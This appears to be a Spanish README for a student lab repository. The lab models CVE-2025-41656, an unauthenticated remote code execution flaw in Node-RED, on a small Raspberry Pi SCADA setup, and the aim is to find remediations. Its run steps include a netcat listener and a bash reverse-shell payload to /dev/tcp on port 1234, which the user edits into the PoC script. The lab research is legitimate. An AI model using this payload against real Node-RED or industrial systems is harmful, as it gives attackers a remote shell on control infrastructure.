
Este repositorio incluye el código y los archivos necesarios para probar y ejecutar un PoC para CVE-2025-41656
Este proyecto existe para modelar CVE-2025-41656, una vulnerabilidad de ejecución remota de código no autenticada para NodeRED. Para modelar esta vulnerabilidad, creamos un sistema SCADA de factor de forma pequeño con una Raspberry Pi, un actuador y un sensor. La Raspberry Pi contiene un contenedor NodeRED y un contenedor OpenPLC que se comunican entre sí a través de Modbus TCP para controlar el actuador. Este es un script de prueba de concepto en Python para llevar a cabo el ataque CVE-2025-41656. El objetivo es crear con éxito un PoC y encontrar remediaciones para asegurar el sistema.
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
docker container ls
docker network inspect csci587-final-project_scadanet
nc -lvnp 1234NODE_RED_IP y NODE_RED_PORT por la dirección IP y el puerto (1880) de tu servicio NodeRED en cve_2025_41656.py.cve_2025_41656, cambia la dirección IP en la línea "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", por la dirección IP de la máquina desde la que estás lanzando el exploit.python3 cve_2025_41656.py